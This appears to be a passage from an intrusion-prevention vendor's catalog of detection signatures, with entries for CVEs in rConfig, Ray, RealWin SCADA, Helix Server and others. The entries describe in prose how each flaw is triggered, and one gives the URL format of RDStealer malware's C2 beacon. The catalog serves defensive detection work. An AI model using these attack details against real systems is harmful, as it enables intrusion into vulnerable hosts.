Description: A vulnerability in RaspberryMatic which allows remote attackers to upload malicious .tgz firmware files, via /pages/jpages/system/DeviceFirmware/addFirmware, to a directory location outside of the predefined temp directory by way of directory traversal.
Situation: HTTP_CS-RaspberryMatic-Unauthenticated-RCE-Vulnerability-Through-HMServer-File-Upload
References:
CVE-2024-24578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24578
Back to top

Ray-Agent-Job-RCE-CVE-2023-48022

About this vulnerability: A vulnerability in Ray Agent
Risk: Moderate
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: Ray Agent
Type: Input Validation
Description: Insufficient input validation in the agent job submission endpoint causes a remote code execution in Ray. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Ray-Agent-Job-RCE-CVE-2023-48022
References:
CVE-2023-48022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48022
Back to top

Ray-OS-Command-Injection-Via-Format-Parameter-CVE-2023-6019

About this vulnerability: An attempt to exploit a vulnerability in Ray OS detected
Risk: High
First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1711-5242
Platform: Generic
Software: Ray OS
Type: Input Validation
Description: A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.
Situation: HTTP_CSU-Ray-OS-Command-Injection-Via-Format-Parameter-CVE-2023-6019
References:
CVE-2023-6019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6019
Back to top

rConfig-Ajaxarchivefiles.php-Command-Injection

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1217-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: There has been reported a post-auth command injection vulnerability in rConfig Network Device Configuration Tool. Successful exploitation could result in arbitrary command execution.
Situation: HTTP_CRL-rConfig-Ajaxarchivefiles.php-Command-Injection
References:
CVE-2019-19509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19509
Back to top

rConfig-Ajaxserversettingschk.php-Command-Injection

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: High
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: A command injection vulnerability has been reported in rConfig Network Device Configuration Tool. The vulnerability is due to insufficient input validation in the ajaxServerSettingsChk.php. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary command execution with the web server privilege on the target system.
Situation: HTTP_CRL-rConfig-Ajaxserversettingschk.php-Command-Injection
References:
CVE-2019-16662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16662
Back to top

rConfig-Commands.inc.php-SQL-Injection

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: High
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: SQL Injection
Description: There exists a vulnerability in rConfig Network Device Configuration Tool, versions 3.9.4 and before, which allows remote attackers to execute arbitrary SQL commands by sending a crafted request, due to the insufficient input validation in the commands.inc.php.
Situation: HTTP_CRL-rConfig-Commands.inc.php-SQL-Injection
References:
CVE-2020-10220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220
Back to top

rConfig-Compliancepolicies.PHP-SQL-Injection

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: Improper handling of request parameters in compliancepolicies.inc.php causes an SQL injection vulnerability in rConfig. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-rConfig-Compliancepolicies-Snippets.PHP-SQL-Injection
References:
CVE-2020-10546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
Back to top

rConfig-Compliancepolicies_PHP-SQL-Injection

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1429-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: Improper validation of request parameters causes an SQL injection vulnerability in rConfig. A successful exploit allows an attacker to execute arbitrary SQL on the target database.
References:
CVE-2020-10546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
Back to top

rConfig-Devices.inc.php-SQL-Injection

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1209-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: A SQL injection vulnerability has been reported in rConfig Network Device Configuration Tool. The vulnerability is due to insufficient input validation in the devices.inc.php. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL commands against the database on the target server.
Situation: HTTP_CRL-rConfig-Devices.inc.php-SQL-Injection
References:
CVE-2019-19207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19207
Back to top

rConfig-Install-Command-Execution

About this vulnerability: A vulnerability in rConfig
Risk: High
First detected in: sgpkg-ips-1203-5242
Last changed: sgpkg-ips-1731-5242
Platform: Linux; Unix
Software: rConfig
Type: Input Validation
Description: A vulnerability in rConfig, versions 3.9.2 and before, which allows remote attackers to execute arbitrary code via ajaxServerSettingsChk.php in the install directory, due to insufficient validation of user input.
Situation: HTTP_CRL-rConfig-Ajaxserversettingschk.php-Command-Injection
References:
CVE-2019-16662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16662
Back to top

rConfig-Network-Device-Configuration-Ajaxcomparegetcmddates-SQL-Injection

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: Insufficient input validation in ajaxCompareGetCmdDates.php causes an SQL injection vulnerability in the rConfig network configuration tool. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-rConfig-Network-Device-Configuration-Ajaxcomparegetcmddates-SQL-Injection
References:
CVE-2022-45030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45030
Back to top

rConfig-Network-Device-Configuration-Tool-Ajaxaddtemplate.php-Command-Injection

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: There has been reported a command injection vulnerability in rConfig Network Device Configuration Tool. Successful exploitation could lead in arbitrary command execution.
Situation: HTTP_CRL-rConfig-Network-Device-Configuration-Tool-Ajaxaddtemplate.php-Command-Injection
References:
CVE-2020-10221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10221
Back to top

rConfig-Network-Device-Configuration-Tool-Configdevice.php-Cross-Site-Scripting

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in rConfig Network Device Configuration Tool. The vulnerability is due to improper validation of rid request parameter by configDevice.php. A remote attacker could exploit this vulnerability by enticing a victim to open a link or a web page. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-rConfig-Network-Device-Configuration-Tool-Configdevice.php-Cross-Site-Scripting
References:
CVE-2020-12259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12259
Back to top

rConfig-Network-Device-Configuration-Tool-DeviceMgmt-Cross-Site-Scripting

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: Improper validation of request parameters causes a cross-site scripting vulnerability in rConfig. A successful exploit allows an attacker to run scripts in the affected user's browser.
Situation: HTTP_CRL-rConfig-Network-Device-Configuration-Tool-DeviceMgmt-Cross-Site-Scripting
References:
CVE-2020-12256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12256
Back to top

rConfig-Network-Device-Configuration-Vendor-Arbitrary-File-Upload

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: Improper validation of file uploads in vendor.crud.php causes a file upload vulnerability. A successful exploit allows an attacker to upload arbitrary code to be executed by the target system.
Situation: HTTP_CS-rConfig-Network-Device-Configuration-Vendor-Arbitrary-File-Upload
References:
CVE-2020-12255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12255
Back to top

rConfig-Remote-Code-Execution-CVE-2019-16662

About this vulnerability: A vulnerability in rConfig
Risk: High
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1731-5242
Platform: Generic
Software: rConfig
Type: Malfunction
Description: There exists a pre-auth remote code execution vulnerability in rConfig. Succesful exploitation could lead in arbitrary code execution. This situation also covers post-auth RCE vulnerability CVE-2019-16663.
References:
CVE-2019-16662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16662
Back to top

rConfig-Search.crud.php-Command-Injection

About this vulnerability: A vulnerability in rConfig Network Device Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: There exists a post-auth command injection vulnerability in rConfig Network Device Configuration Tool. Succesful exploitation could lead in arbitrary command execution.
Situation: HTTP_CRL-rConfig-Search.crud.php-Command-Injection
References:
CVE-2019-16663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16663
Back to top

rConfig-Vendors-Authenticated-File-Upload-RCE

About this vulnerability: A vulnerability in rConfig.
Risk: High
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Platform: Generic
Software: rConfig
Type: Input Validation
Description: A vulnerability in rConfig, versions 3.9.6 and before, which allows remote attackers to upload arbitrary files to /lib/crud/vendors.crud.php and exexute them via images/vendor/<payload_file>.php.
Situation: HTTP_CS-rConfig-Vendors-Authenticated-File-Upload-RCE
Back to top

Rdesktop-Process_Redirect_PDU-BSS-Overflow

About this vulnerability: A vulnerability in rdesktop
Risk: High
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix;
Software: rdesktop
Type: Malfunction
Description: Buffer overflow in the process_redirect_pdu (rdp.c) function in rdesktop 1.5.0 allows remote attackers to execute arbitrary code via a Remote Desktop Protocol (RDP) redirect request with modified length fields.
Situation: Generic_SS-Rdesktop-Process_Redirect_PDU-BSS-Overflow
References:
CVE-2008-1802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1802
BID-29097
http://www.securityfocus.com/bid/29097
Back to top

RDP-ActiveX-Control-Remote-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in an ActiveX RDP component
Risk: Moderate
First detected in: sgpkg-ips-519-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Attack against an ActiveX RDP component
Situation: File-Text_RDP-ActiveX-Control-Remote-Code-Execution-Vulnerability
References:
CVE-2013-1296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1296
BID-58874
http://www.securityfocus.com/bid/58874
OSVDB-92122
http://www.osvdb.org/92122
MS13-029
http://technet.microsoft.com/security/bulletin/MS13-029
Back to top

RDP_Microsoft-Remote-Desktop-Client-Vulnerability-MS09-044

About this vulnerability: Clientside remote code execution vulnerability in Remote Desktop
Risk: High
First detected in: sgpkg-ips-237-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A client-side vulnerability exists in Microsoft Remote Desktop Software. If a user connects to a malicious RDP server, the remote server can trigger the vulnerability and execute arbitrary code in the victim's computer.
Situation: Generic_RDP-Client-Remote-Code-Execution-MS09-044
References:
CVE-2009-1133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1133
MS09-044
http://technet.microsoft.com/security/bulletin/MS09-044
Back to top

RDS.Dataspace-ActiveX-Control-Remote-Code-Execution

About this vulnerability: There is a code execution vulnerability in RDS.Dataspace ActiveX Control
Risk: High
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Data Access Components
Type: Malfunction
Description: There is a remote code execution vulnerability in RDS.Dataspace ActiveX control included in the Microsoft Data Access Components (MDAC).
Situation: HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-2
HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-3
File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-3
File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-2
File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-4
References:
CVE-2006-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003
BID-17462
http://www.securityfocus.com/bid/17462
OSVDB-24517
http://www.osvdb.org/24517
MS06-014
http://technet.microsoft.com/security/bulletin/MS06-014
Back to top

RDStealer-Malware-C2-Traffic

About this vulnerability: Command-and-control traffic by RDStealer malware detected
Risk: High
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
Platform: Generic
Software: RDStealer Malware
Type: Backdoor
Description: This fingerprint catches the request that RDStealer malware makes to another server on the same network that was designated as a proxy to communicate with the C2 infrastructure of threat actors. The request is in the format: https://<Proxy Address>:7443/pdr.php?name=<Host>&ip=<Host IP Address>.
Situation: HTTP_CSU-RDStealer-Malware-C2-Traffic
File-Text_RDStealer-Malware-C2-Traffic
Back to top

RealFlex-RealWin-FC_RFUSER_FCS_Login-Buffer-Overflow

About this vulnerability: A vulnerability in RealFlex RealWin SCADA System
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealFlex RealWin SCADA System; RealFlex RealWin SCADA System
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in RealFlex RealWin SCADA server that could be exploited by remote attackers to compromise a vulnerable system. The flaw is due to a boundary error in the handling of a "FC_RFUSER_FCS_LOGIN" request sent to the server. Remote, unauthenticated attackers could exploit this vulnerability by sending a specially crafted packet to TCP port 910 on the target. Successful exploitation would cause a stack buffer overflow that could cause the host to become unresponsive, and may lead to code injection and execution in the context of the affected server, normally Administrator on Windows systems.
Situation: Generic_CS-RealFlex-RealWin-FC_RFUSER_FCS_Login-Buffer-Overflow
Back to top

RealFlex-RealWin-FC_Script_FCS_STARTPROG-Buffer-Overflow

About this vulnerability: A vulnerability in RealFlex RealWin SCADA System
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealFlex RealWin SCADA System
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in RealFlex RealWin SCADA server that could be exploited by remote attackers to compromise a vulnerable system. The flaw is due to a boundary error in the handling of "On_FC_SCRIPT_FCS_STARTPROG" requests sent to the server. Remote, unauthenticated attackers could exploit this vulnerability via sending a specially crafted packet to TCP port 910 on the target. Successful exploitation may lead to code injection and execution in the context of the affected server, normally Administrator on Windows systems, or cause the target server to become unresponsive.
Situation: Generic_CS-RealFlex-RealWin-FC_Script_FCS_STARTPROG-Buffer-Overflow
Back to top

RealFlex-RealWin-Multiple-Buffer-Overflows

About this vulnerability: Multiple vulnerabilities in RealFlex RealWin SCADA System
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealFlex RealWin SCADA System
Type: Buffer Overflow
Description: There are multiple stack-based buffer overflows in DATAC RealFlex RealWin 2.1 and earlier. The vulnerabilities allow remote attackers to execute arbitrary code via various crafted packets sent to port 910.
Situation: Generic_CS-RealFlex-RealWin-Buffer-Overflow-Attempt
References:
CVE-2011-1563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1563
BID-46937
http://www.securityfocus.com/bid/46937
Back to top

RealFlex-RealWin-SCADA-Scpc_Initialize-Buffer-Overflow

About this vulnerability: A vulnerability in RealFlex RealWin SCADA System
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealFlex RealWin SCADA System
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in RealFlex RealWin SCADA System that could be exploited by remote attackers to compromise a vulnerable system.
Situation: Generic_CS-RealFlex-RealWin-SCADA-Scpc_Initialize-Buffer-Overflow
References:
CVE-2010-4142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4142
BID-44150
http://www.securityfocus.com/bid/44150
Back to top

RealFlex-RealWin-Tag-Manipulation-Buffer-Overflow

About this vulnerability: A vulnerability in RealFlex RealWin SCADA System
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealFlex RealWin SCADA System
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in RealFlex RealWin SCADA server that could be exploited by remote attackers to compromise a vulnerable system. The flaw is due to a boundary error in the handling of FC_CTAGLIST_FCS_CADDTAG, FC_CTAGLIST_FCS_CDELTAG and FC_CTAGLIST_FCS_ADDTAGMS requests sent to the server. Remote, unauthenticated attackers could exploit this vulnerability via sending a specially crafted packet to TCP port 910 on the target. Successful exploitation would cause a stack buffer overflow that could cause the host to become unresponsive, and may lead to code injection and execution in the context of the affected server.
Situation: Generic_CS-RealFlex-RealWin-Tag-Manipulation-Buffer-Overflow
Back to top

RealNetworks-Helix-Server-NTLM-Authentication-Heap-Overflow

About this vulnerability: A vulnerability in RealNetworks Helix Mobile Server
Risk: High
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Server
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in the RealNetworks Helix Server product. The flaw is due to an error when handling Base64-encoded NTLM Authentication data. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation can allow for arbitrary code injection and execution with the privileges of the server process.
Situation: HTTP_CSH-RealNetworks-Helix-Server-NTLM-Authentication-Heap-Overflow
References:
CVE-2010-1317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1317
BID-39490
http://www.securityfocus.com/bid/39490
Back to top

RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in RealNetworks Helix Mobile Server
Risk: High
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Mobile Server; RealNetworks Helix Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in RealNetworks Helix Server. The vulnerability is caused by improper handling of crafted rn5auth authentication data. A remote unauthenticated attacker could possibly exploit this vulnerability to execute arbitrary code with System privileges. A failed exploit attempt will terminate the affected server, creating a denial of service condition.
Situation: Generic_CS-RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow
Generic_UDP-RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow
References:
CVE-2012-0942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0942
BID-52929
http://www.securityfocus.com/bid/52929
OSVDB-81056
http://www.osvdb.org/81056
Back to top

RealNetworks-Helix-Server-RTSP-Describe-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in RealNetworks Helix Mobile Server
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Mobile Server; RealNetworks Helix Server; RealNetworks Helix DNA Server
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the way RealNetworks Helix Server handles RTSP requests. Remote unauthenticated attackers can exploit this vulnerability by sending a malicious RTSP request with a crafted Proxy-Require to the affected server. As a result of processing the malicious command, a heap-based buffer overflow can be triggered which may result in injection and execution of arbitrary code within the security privileges of the vulnerable service on the target system. In the case of an attack, where code injection is unsuccessful, the Helix Server service will terminate, and all the connected sessions will be closed immediately. Furthermore, the functionality of all the services that depend on the vulnerable service might be affected as well. In the case where code injection was successful, the behaviour of the system will be entirely dependent on the nature of the injected code. Any code executed will be with the the security privileges of the vulnerable service, normally System.
Situation: Generic_CS-RealNetworks-Helix-Server-RTSP-Describe-Heap-Buffer-Overflow
References:
CVE-2008-5911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5911
BID-33059
http://www.securityfocus.com/bid/33059
Back to top

RealNetworks-Helix-Server-RTSP-GET-Long-URI

About this vulnerability: A long URI in GET-request for RealNetworks Helix Server detected
Risk: Low
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Server
Type: Buffer Overflow
Description: A long URI in a GET-request for RealNetworks Helix RTSP Server was detected. Multiple matches may indicate an attempt to exploit a buffer overflow vulnerability in Helix Server versions below 9.0.
Situation: Generic_CS-RealNetworks-Helix-Server-RTSP-GET-Long-URI
References:
CVE-2002-1643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1643
BID-6458
http://www.securityfocus.com/bid/6458
BID-6456
http://www.securityfocus.com/bid/6456
BID-6454
http://www.securityfocus.com/bid/6454
Back to top

RealNetworks-Helix-Server-RTSP-Set-Parameters-Request-DoS

About this vulnerability: A vulnerability in RealNetworks Helix Unversal Server
Risk: Moderate
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Universal Server
Type: Malfunction
Description: There is a denial of service vulnerability in RealNetworks Helix Server. The vulnerability is due to a logic error in the way RealNetworks Helix Server handle RTSP requests. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted RTSP SET_PARAMETER request to the affected server. As a result of processing the malicious command, a denial of service condition will be created on the target system, the affected service may become unresponsive until it is restarted.
Situation: Generic_CS-RealNetworks-Helix-Server-RTSP-Set-Parameters-Request-DoS
References:
CVE-2009-2533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2533
BID-35731
http://www.securityfocus.com/bid/35731
OSVDB-55981
http://www.osvdb.org/55981
Back to top

RealNetworks-Helix-Server-RTSP-Setup-Request-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in RealNetworks Helix Mobile Server
Risk: Moderate
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: RealNetworks Helix Server
Type: Input Validation
Description: There is a denial of service vulnerability in RealNetworks Helix Server. The vulnerability is due to an error in the way Helix Server handles SETUP requests. Remote unauthenticated attackers can exploit this flaw by sending a crafted SETUP request to an affected server. As a result of processing the malicious command, a denial of service condition will be created on the target system.
Situation: Generic_CS-RealNetworks-Helix-Server-RTSP-Setup-Request-Denial-Of-Service
References:
CVE-2009-2534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2534
BID-35732
http://www.securityfocus.com/bid/35732
OSVDB-55982
http://www.osvdb.org/55982
Back to top

RealNetworks-Helix-Server-RTSP-Setup-Stack-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in RealNetworks Helix Server
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1552-5242
Platform: Windows; Linux
Software: RealNetworks Helix Server; RealNetworks Helix DNA Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the way RealNetworks Helix Server handles RTSP requests. Remote unauthenticated attackers can exploit this vulnerability by sending malicious RTSP SETUP requests to the affected server.
Back to top

RealNetworks-Helix-Server-RTSP-Set_Parameter-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in RealNetworks Helix Mobile Server
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Mobile Server; RealNetworks Helix Server; RealNetworks Helix DNA Server
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the way RealNetworks Helix Server handles RTSP requests. Remote unauthenticated attackers can exploit this vulnerability by sending a malicious RTSP SET_PARAMETER request to the affected server. As a result of processing the malicious command, a heap-based buffer overflow can be triggered which may result in injection and execution of arbitrary code within the security privileges of the vulnerable service on the target system.
Situation: RTSP_CS-RealNetworks-Helix-Server-RTSP-Set_Parameter-Heap-Buffer-Overflow
References:
BID-33059
http://www.securityfocus.com/bid/33059
Back to top

RealNetworks-Helix-Server-SNMP-Master-Agent-Open-PDU-DOS

About this vulnerability: A vulnerability in RealNetworks Helix Mobile Server
Risk: Moderate
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Mobile Server; RealNetworks Helix Server
Type: Malfunction
Description: A denial of service vulnerability has been reported in RealNetworks Helix Server. The vulnerability is caused by improper handling of crafted "DisplayStringLength" parameter in AgentX Open-PDU requests. A remote unauthenticated attacker can exploit this vulnerability to terminate the target service, creating a denial of service condition.
Situation: Generic_CS-RealNetworks-Helix-Server-SNMP-Master-Agent-Open-PDU-DOS
References:
CVE-2012-1923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1923
BID-52929
http://www.securityfocus.com/bid/52929
OSVDB-81054
http://www.osvdb.org/81054
Back to top

RealNetworks-Helix-Transport-Header-Overflow

About this vulnerability: Buffer overflow in RealNetworks Helix Universal Server Transport header
Risk: Moderate
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Server
Type: Buffer Overflow
Description: There is a series of buffer overflow vulnerabilities in older versions of RealNetworks Helix Server. Using a specially crafted Transport-header, an attacker can possibly execute arbitary code in the target server.
Situation: Generic_CS-RealNetworks-Helix-Transport-Header-Overflow
References:
CVE-2002-1643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1643
BID-6454
http://www.securityfocus.com/bid/6454
OSVDB-4580
http://www.osvdb.org/4580
Back to top

RealNetworks-Helix-Universal-Server-Denial-Of-Service-Vulnerability

About this vulnerability: A vulnerability in RealNetworks Helix Universal Server
Risk: Moderate
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Universal Server
Type: Buffer Overflow
Description: RealNetworks Helix Universal Server 9.0.1 and 9.0.2 allows remote attackers to cause a denial of service (crash) via malformed requests that trigger a null dereference, as demonstrated using (1) GET_PARAMETER or (2) DESCRIBE requests.
Situation: Generic_CS-RealNetworks-Helix-Universal-Server-Denial-Of-Service-Vulnerability
References:
CVE-2004-0389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0389
BID-10157
http://www.securityfocus.com/bid/10157
Back to top

RealNetworks-Helix-Universal-Server-RTSP-Describe-BOF

About this vulnerability: Buffer overflow in RealNetworks Helix Universal Server
Risk: High
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Universal Server
Type: Buffer Overflow
Description: RealNetworks Helix Universal Server is vulnerable to a buffer overflow due to insufficient bounds checking on the 'describe' field of a RTSP request. This allows remote execution of arbitrary code with the privileges of the Helix Universal Server process.
Situation: Generic_RealNetworks-Helix-Universal-Server-RTSP-Describe-BOF
References:
CVE-2002-1643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1643
BID-6456
http://www.securityfocus.com/bid/6456
Back to top

RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution

About this vulnerability: An attempt to exploit a vulnerability in RealNetworks RealGames
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealNetworks RealGames
Type: Malfunction
Description: Multiple remote command execution vulnerabilities exist in RealNetworks RealGames StubbyUtil.ProcessMgr ActiveX. The vulnerabilities are due to design flaws in four insecurely implemented methods. An attacker can leverage this vulnerability by enticing a target user to open a crafted web page.
Situation: HTTP_SS-RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution
File-Text_RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution
References:
OSVDB-71559
http://www.osvdb.org/71559
Back to top

RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the RealNetworks RealPlayer ActiveX control
Risk: High
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer
Type: Buffer Overflow
Description: RealNetworks RealPlayer has a stack-based buffer overflow vulnerability. By persuading a user with an affected version of the product to visit a malicious web page, a remote attacker can execute arbitrary code on a vulnerable host with the privileges of the currently logged in user.
Situation: HTTP_SS-RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow
File-Text_RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow
References:
CVE-2008-3066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3066
BID-30379
http://www.securityfocus.com/bid/30379
Back to top

RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution

About this vulnerability: A vulnerability in RealNetworks Realplayer
Risk: High
